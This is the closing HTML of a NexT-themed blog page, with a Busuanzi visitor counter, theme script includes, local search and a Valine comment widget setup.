  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'YxcX5Cznyp28BYsOhkgW4VH2-gzGzoHsz',
      appKey     : 'DNYhYDu0OfL5c9gaMjQ1vbNC',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
